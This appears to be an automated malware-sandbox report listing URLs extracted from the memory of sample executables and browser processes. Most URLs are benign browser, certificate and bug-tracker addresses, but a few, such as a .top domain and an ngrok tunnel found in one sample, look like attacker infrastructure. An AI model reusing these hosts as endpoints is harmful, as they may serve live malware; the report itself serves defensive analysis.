Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FB25000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3333132009.0000024F70551000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://issuetracker.google.com/200067929
Source: firefox.exe, 0000001E.00000003.2810071496.0000019DE8777000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2801409202.0000019DE87DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2804011923.0000019DE87DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2806401904.0000019DE81EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2798501613.0000019DE81DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F737F9000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3376180687.0000024F7492B000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3345205080.0000024F70F18000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3370094276.0000024F73DC3000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F737CF000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3367873176.0000024F73A35000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3367873176.0000024F73A44000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3350964569.0000024F70FAD000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3366732850.0000024F7389A000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3377344045.0000024F74A88000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3366732850.0000024F73866000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3366732850.0000024F73863000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3357550442.0000024F711A9000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7379F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3372721604.0000024F74423000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F737E2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chrome.exe, 00000022.00000002.3007735332.00006DEC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: file.exe, 00000000.00000002.2157778162.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2157380514.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3368256754.0000024F73ADC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000022.00000002.2931029345.00006DEC00078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000022.00000002.2931029345.00006DEC00078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGetm
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000022.00000002.3012833020.00006DEC00B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000022.00000002.3012833020.00006DEC00B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000022.00000002.2931029345.00006DEC00078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013398134.00006DEC00BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013398134.00006DEC00BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
